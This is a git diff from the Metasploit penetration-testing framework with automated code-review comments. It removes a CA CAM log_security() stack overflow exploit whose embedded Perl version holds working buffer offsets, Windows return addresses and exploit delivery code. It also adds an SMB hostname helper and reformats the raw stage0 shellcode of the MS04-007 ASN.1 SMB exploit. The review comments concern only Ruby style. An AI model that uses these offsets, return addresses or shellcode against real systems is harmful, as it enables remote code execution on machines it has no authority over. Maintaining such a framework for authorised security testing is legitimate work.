diff --git a/dev/porting/queue/cacam_logsecurity_win32.rb b/dev/porting/queue/cacam_logsecurity_win32.rb
deleted file mode 100644
index b61b1197a9..0000000000
--- a/dev/porting/queue/cacam_logsecurity_win32.rb
+++ /dev/null
@@ -1,179 +0,0 @@
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
-
- include Exploit::Remote::Tcp
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'CA CAM log_security() Stack Overflow (Win32)',
- 'Description' => %q{
- This module exploits a vulnerability in the CA CAM service
- by passing a long parameter to the log_security() function.
- The CAM service is part of TNG Unicenter. This module has
- been tested on Unicenter v3.1.
-
- },
- 'Author' => [ 'hdm' ],
- 'Version' => '$Revision$',
- 'References' =>
- [
-
- ],
- 'Privileged' => true,
- 'Payload' =>
- {
- 'Space' => 1024,
- 'BadChars' => "\x00",
- 'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
-
- },
- 'Targets' =>
- [
- [
- 'Automatic Targetting',
- {
- 'Platform' => 'win32, winnt, win2000, winxp, win2003',
- 'Ret' => 0x0,
- },
- ],
- ],
- 'DisclosureDate' => '',
- 'DefaultTarget' => 0))
- end
-
- def exploit
- connect
-
- handler
- disconnect
- end
-
-=begin
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::cacam_logsecurity_win32;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
- {
- 'Name' => 'CA CAM log_security() Stack Overflow (Win32)',
- 'Version' => '$Revision$',
- 'Authors' => [ 'H D Moore ' ],
- 'Arch' => [ 'x86' ],
- 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
- 'Priv' => 1,
- 'AutoOpts' => { 'EXITFUNC' => 'process' },
-
- 'UserOpts' =>
- {
- 'RHOST' => [1, 'ADDR', 'The target address'],
- 'RPORT' => [1, 'PORT', 'The target port', 4105],
- },
-
- 'Payload' =>
- {
- 'Space' => 1024,
- 'BadChars' => "\x00",
- 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
- 'Keys' => ['+ws2ord'],
- },
-
- 'Description' => Pex::Text::Freeform(qq{
- This module exploits a vulnerability in the CA CAM service by passing
- a long parameter to the log_security() function. The CAM service is part
- of TNG Unicenter. This module has been tested on Unicenter v3.1.
-}),
-
- 'Refs' =>
- [
-
- ],
-
- 'DefaultTarget' => 0,
- 'Targets' =>
- [
- # W2API.DLL @ 0x01950000 - return to ESI
- # $Header$
- ['W2API.DLL TNG 2.3', 0x01951107],
-
- # return to ESI in ws2help.dll
- ['Windows 2000 SP0-SP4 English', 0x750217ae],
- ['Windows XP SP0-SP1 English', 0x71aa16e5],
- ['Windows XP SP2 English', 0x71aa1b22],
- ['Windows 2003 SP0 English', 0x71bf175f],
- ],
-
- 'Keys' => ['cam'],
- };
-
-sub new {
- my $class = shift;
- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Exploit {
- my $self = shift;
- my $target_host = $self->GetVar('RHOST');
- my $target_port = $self->GetVar('RPORT');
- my $target_idx = $self->GetVar('TARGET');
- my $shellcode = $self->GetVar('EncodedPayload')->Payload;
- my $target = $self->Targets->[$target_idx];
-
- $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
-
-
- my $s = Msf::Socket::Tcp->new
- (
- 'PeerAddr' => $target_host,
- 'PeerPort' => $target_port,
- );
-
- if ($s->IsError) {
- $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
- return;
- }
-
- my $pattern = Pex::Text::EnglishText(4096);
-
- # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
- substr($pattern, 1016, 4, pack('V', $target->[1]));
- substr($pattern, 1052, length($shellcode), $shellcode);
-
- my $req =
- "\xfa\xf9\x00\x10" . $pattern . "\x00";
-
- my $ack = $s->Recv(4, 5);
- if ($ack ne "ACK\x00") {
- $self->PrintLine("[*] The CAM service is not responding.");
- return;
- }
- $s->Send($req);
- $s->Recv(-1,1);
- $self->Handler($s);
- $s->Close();
-
- return;
-}
-
-1;
-
-=end
-
-
-end
-end
diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb
index 6f72c016d1..fad8df2497 100644
--- a/lib/msf/core/exploit/smb.rb
+++ b/lib/msf/core/exploit/smb.rb
@@ -197,6 +197,10 @@ module Exploit::Remote::SMB
 return data
 end
+ def smb_hostname
+ datastore['SMBNAME'] || '*SMBSERVER'
+ end
+
 attr_accessor :simple
 end
diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb
index e2685a6840..26d988cd68 100644
--- a/modules/exploits/windows/smb/ms04_007_killbill.rb
+++ b/modules/exploits/windows/smb/ms04_007_killbill.rb
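Review bot: `smb_hostname` in lib/msf/core/exploit/smb.rb is undocumented, and its `||` fallback only fires when SMBNAME is nil or false, so an SMBNAME set to the empty string is sent verbatim as the called name in the session request. I'd put `# NetBIOS called name for the session request; '*SMBSERVER' is the generic wildcard name.` above the def and make the fallback cover the empty case, e.g. `name = datastore['SMBNAME']` followed by `(name.nil? || name.empty?) ? '*SMBSERVER' : name`. Registration of the SMBNAME option is not visible in this hunk; presumably it lives in the mixin's initialize, which is worth confirming, since an unregistered key yields nil and the wildcard is then always used. The ms04_007_killbill change below now depends on this helper.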
@@ -78,29 +78,30 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote
 def exploit
 # The first stage shellcode fixes the PEB pointer and cleans the heap
- stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
- "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
- "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
- "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
- "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
- "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
- "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
- "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
- "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
- "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
- "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
- "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
- "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
- "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
- "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
- "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
- "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
- "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
- "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
- "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
- "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
- "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
- "\x08\x00\xeb\xfe"
+ stage0 =
+ "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
+ "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
+ "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
+ "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
+ "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
+ "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
+ "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
+ "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
+ "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
+ "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
+ "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
+ "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
+ "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
+ "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
+ "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
+ "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
+ "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
+ "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
+ "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
+ "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
+ "\x08\x00\xeb\xfe"
 token = spnego_token(stage0, payload.encoded)
@@ -121,7 +122,7 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote
 client = Rex::Proto::SMB::Client.new(sock)
 begin
- client.session_request(name) if not datastore['SMBDirect']
+ client.session_request(smb_hostname()) if not datastore['SMBDirect']
 client.negotiate
 client.session_setup_ntlmv2_blob(token)
 rescue => e
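Review bot: The changed call in the second hunk of ms04_007_killbill.rb (`@@ -121,7 +122,7 @@`) reads `smb_hostname()` with empty parentheses and keeps `if not`, neither of which is idiomatic Ruby for a parameterless method call and a negated modifier; I'd write `client.session_request(smb_hostname) unless datastore['SMBDirect']`. The old line passed a local `name`; if that variable is still assigned somewhere between the two hunks (not visible here), it is now dead and should be removed together with any option it was derived from. The enclosing `exploit` method starts in the first hunk and ends outside both hunks.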